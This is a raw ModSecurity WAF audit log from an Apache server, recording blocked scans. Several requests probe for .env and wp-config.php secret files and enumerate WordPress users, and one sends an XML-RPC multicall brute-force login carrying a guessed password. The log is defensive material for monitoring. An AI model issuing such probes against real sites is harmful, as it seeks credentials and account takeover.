Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --534bd94f-Z-- --692eda33-A-- [24/May/2025:16:43:38 +0700] aDGUyjvI5DIWBJ2mFG5MAgAAANI 103.236.140.4 53642 103.236.140.4 8181 --692eda33-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.128.83.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.83.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --692eda33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --692eda33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748079818070969 2211 (- - -) Stopwatch2: 1748079818070969 2211; combined=1133, p1=379, p2=726, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --692eda33-Z-- --151f716c-A-- [24/May/2025:16:44:40 +0700] aDGVCOO2UzDOKMmK0i6kMQAAAAA 103.236.140.4 53672 103.236.140.4 8181 --151f716c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --151f716c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix_admin@321 --151f716c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --151f716c-E-- --151f716c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748079880707895 6250 (- - -) Stopwatch2: 1748079880707895 6250; combined=4465, p1=517, p2=3775, p3=0, p4=0, p5=103, sr=121, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --151f716c-Z-- --1d6ee624-A-- [24/May/2025:17:04:14 +0700] aDGZnjvI5DIWBJ2mFG5MegAAAMY 103.236.140.4 54002 103.236.140.4 8181 --1d6ee624-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.181.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.181.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1d6ee624-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d6ee624-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748081054344199 2886 (- - -) Stopwatch2: 1748081054344199 2886; combined=1268, p1=420, p2=819, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d6ee624-Z-- --e1882549-A-- [24/May/2025:17:24:44 +0700] aDGebPmzt4abyoi_U9n_tgAAAJI 103.236.140.4 54542 103.236.140.4 8181 --e1882549-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --e1882549-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1882549-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748082284255303 842 (- - -) Stopwatch2: 1748082284255303 842; combined=337, p1=300, p2=0, p3=0, p4=0, p5=37, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1882549-Z-- --ceb40d3c-A-- [24/May/2025:17:24:45 +0700] aDGebTvI5DIWBJ2mFG5NFgAAAMk 103.236.140.4 54546 103.236.140.4 8181 --ceb40d3c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --ceb40d3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceb40d3c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748082285439173 678 (- - -) Stopwatch2: 1748082285439173 678; combined=283, p1=241, p2=0, p3=0, p4=0, p5=42, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceb40d3c-Z-- --481fed07-A-- [24/May/2025:17:28:21 +0700] aDGfRTvI5DIWBJ2mFG5NNAAAANc 103.236.140.4 54664 103.236.140.4 8181 --481fed07-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.105.206.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.105.206.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --481fed07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --481fed07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748082501427362 3228 (- - -) Stopwatch2: 1748082501427362 3228; combined=1403, p1=452, p2=919, p3=0, p4=0, p5=32, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --481fed07-Z-- --2942a44b-A-- [24/May/2025:17:38:52 +0700] aDGhvDvI5DIWBJ2mFG5NbwAAANg 103.236.140.4 54838 103.236.140.4 8181 --2942a44b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --2942a44b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2942a44b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748083132157057 515 (- - -) Stopwatch2: 1748083132157057 515; combined=189, p1=165, p2=0, p3=0, p4=0, p5=24, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2942a44b-Z-- --acd0691b-A-- [24/May/2025:17:49:35 +0700] aDGkPzvI5DIWBJ2mFG5NrAAAANQ 103.236.140.4 55082 103.236.140.4 8181 --acd0691b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.111.20.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.111.20.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --acd0691b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acd0691b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748083775588977 2643 (- - -) Stopwatch2: 1748083775588977 2643; combined=1206, p1=442, p2=735, p3=0, p4=0, p5=29, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acd0691b-Z-- --4e2c2255-A-- [24/May/2025:17:55:49 +0700] aDGltfmzt4abyoi_U9n_8gAAAJQ 103.236.140.4 55150 103.236.140.4 8181 --4e2c2255-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.254.243.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.254.243.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e2c2255-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e2c2255-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084149704889 2800 (- - -) Stopwatch2: 1748084149704889 2800; combined=1268, p1=459, p2=779, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e2c2255-Z-- --fdf0b62f-A-- [24/May/2025:17:56:17 +0700] aDGl0fmzt4abyoi_U9n_9gAAAIk 103.236.140.4 55160 103.236.140.4 8181 --fdf0b62f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.178.115.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.178.115.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fdf0b62f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdf0b62f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748084177440308 2780 (- - -) Stopwatch2: 1748084177440308 2780; combined=1248, p1=421, p2=797, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdf0b62f-Z-- --019c4565-A-- [24/May/2025:18:06:20 +0700] aDGoLDvI5DIWBJ2mFG5N7gAAANA 103.236.140.4 56322 103.236.140.4 8181 --019c4565-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --019c4565-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --019c4565-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084780373400 757 (- - -) Stopwatch2: 1748084780373400 757; combined=264, p1=233, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --019c4565-Z-- --94bafc70-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTkgAAAEg 103.236.140.4 56482 103.236.140.4 8181 --94bafc70-B-- GET /flask/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --94bafc70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94bafc70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785538039 842 (- - -) Stopwatch2: 1748084785538039 842; combined=336, p1=295, p2=0, p3=0, p4=0, p5=40, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94bafc70-Z-- --dc53763b-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OAAAAAM0 103.236.140.4 56484 103.236.140.4 8181 --dc53763b-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --dc53763b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc53763b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785538092 968 (- - -) Stopwatch2: 1748084785538092 968; combined=406, p1=357, p2=0, p3=0, p4=0, p5=48, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc53763b-Z-- --0c354454-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OAQAAANA 103.236.140.4 56486 103.236.140.4 8181 --0c354454-B-- GET /symfony/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --0c354454-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c354454-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785539606 512 (- - -) Stopwatch2: 1748084785539606 512; combined=190, p1=168, p2=0, p3=0, p4=0, p5=22, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c354454-Z-- --810bcd35-A-- [24/May/2025:18:06:25 +0700] aDGoMeO2UzDOKMmK0i6k6AAAAAo 103.236.140.4 56488 103.236.140.4 8181 --810bcd35-B-- GET /next/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --810bcd35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --810bcd35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785542468 682 (- - -) Stopwatch2: 1748084785542468 682; combined=271, p1=241, p2=0, p3=0, p4=0, p5=29, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --810bcd35-Z-- --d89dd92d-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OAgAAAMw 103.236.140.4 56490 103.236.140.4 8181 --d89dd92d-B-- GET /.env.local HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --d89dd92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d89dd92d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785542551 752 (- - -) Stopwatch2: 1748084785542551 752; combined=222, p1=180, p2=0, p3=0, p4=0, p5=41, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d89dd92d-Z-- --63a06c28-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OAwAAAMY 103.236.140.4 56492 103.236.140.4 8181 --63a06c28-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --63a06c28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63a06c28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785546493 602 (- - -) Stopwatch2: 1748084785546493 602; combined=222, p1=194, p2=0, p3=0, p4=0, p5=28, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
